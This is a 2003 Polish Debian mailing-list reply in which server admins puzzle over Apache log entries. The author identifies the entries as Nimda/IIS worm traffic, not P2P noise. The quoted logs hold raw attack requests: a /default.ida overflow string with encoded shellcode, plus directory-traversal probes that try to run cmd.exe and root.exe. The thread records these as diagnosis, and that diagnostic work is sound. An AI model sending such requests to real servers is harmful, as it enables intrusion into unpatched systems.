Re: Dziwny dziw :)

To: debian-user-polish <debian-user-polish@lists.debian.org>
Subject: Re: Dziwny dziw :)
From: "Tomasz T. Ciaszczyk" <ciacho@ciacho.pl>
Date: Mon, 20 Jan 2003 08:32:21 +0100
Message-id: <20030120073221.GA30604@ciacho.pl>
Mail-followup-to: debian-user-polish <debian-user-polish@lists.debian.org>
In-reply-to: <48173597349.20030119232541@protonet.pl>
References: <Pine.LNX.4.44.0301191332250.29997-100000@panoramix.ift.uni.wroc.pl> <48173597349.20030119232541@protonet.pl>

Tomasz Jajonek napisał w dniu nie, sty 19, 2003 at 11:25:41 CET co następuje:
: Hello t0masz,
: 
: Sunday, January 19, 2003, 1:32:55 PM, you wrote:
: 
: >> on Sat, 18 Jan 2003 01:18:27 +0100 "Tomasz T. Ciaszczyk" <ciacho@ciacho.pl> wrote:
: >>
: >> > 61.55.142.76 - - [12/Jan/2003:14:07:15 +0100] "GET
: >> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
: >>  HTTP/1.0" 400 328 "-" "-"
: >> > 209.105.192.82 - - [12/Jan/2003:14:41:23 +0100] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
: >> > 194.27.78.23 - - [12/Jan/2003:16:22:31 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 286 "-" "-"
: >> > 194.27.78.23 - - [12/Jan/2003:16:22:34 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
: >> > 194.27.78.23 - - [12/Jan/2003:16:22:44 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294 "-" "-"
: >> > 194.27.78.23 - - [12/Jan/2003:16:22:48 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294 "-" "-"
: >> i jeszcze coś: to chyba nie pochodzi z inetu, raczej ktoś spoofuje
: 
: Ja mam to samo i nawet doszedlem to tego co to jest :-) Prawdopodobnie
: masz siec i userow lubiacych Kazaa, eDonkeya z Mulem i ty podobnymi
: smieciami. U mnie dochodzilo do paru tysiecy polaczen na Apacha na
[...]
: mam jeszcze czasami jakies polaczenia ale juz nie taka ilosc. Krotko
: mowiac sa to smieci z programow Peer to Peer.
I tutaj slonce sie mylisz..
Moja siec sklada sie z zupelnie innych klientow... I bron boze zadnych
windowsow (poza jednym NT) w moim LANie nie ma..
Programow P2P tez nie ma..

W tym wypadku poprawna odpowiedz brzmiala: Nimbda (czy jak sie tam on
zwal) wirus dla IIS'a. Niestety, ale userzy WinShitow nei zawsze mysla
o tym ze wypada cos zabezpieczyc nawet jak im sie trabi o tym...
Ciekawi mnie ile jeszcze wiekow bedzie uzywany niezabezpieczony Ajtjuk
czy chociazby ten szczesny IIS.

 
: Administrator sieci PROTONET
Sam jestem adminem sieci, ale potrafie rozroznic ISP dajacego lacze (a
szczegolnie na osiedlowki), od ISP hostingowego... 

PS2. W drugiej firmie mam wlasnie uzyszkodnikow uzywajacych P2P i
jakos tam takich odwolan (o dziwo) nie mam. Kazy i inne muje dzialaja
(a czemu by nie.. tylko ze z transferem 1kbps).


EOT.

-- 
Pozdrawiam,
TTC

  .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-
.:: Tomasz T. Ciaszczyk [ ciacho<at>ciacho.pl ] >> http://ciacho.pl <<
.::
.:: No Love, no Peace, no Mercy
.:: - Only Me, Lord War, Lady Death
.:: -- TTC
  `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Reply to:

Follow-Ups:
- Re[2]: Dziwny dziw :)
  - From: Tomasz Jajonek <jajonek.t@protonet.pl>
- Re: Dziwny dziw :)
  - From: Rafal Bujnowski <bujnor@go2.pl>

References:
- Re: Dziwny dziw :)
  - From: t0masz zab0rowski <zabora@panoramix.ift.uni.wroc.pl>
- Re[2]: Dziwny dziw :)
  - From: Tomasz Jajonek <jajonek.t@protonet.pl>

Prev by Date: Re[2]: Dziwny dziw :)
Next by Date: serwer zrywa pierwsze połączenie
Previous by thread: Re[2]: Dziwny dziw :)
Next by thread: Re[2]: Dziwny dziw :)
Index(es):
- Date
- Thread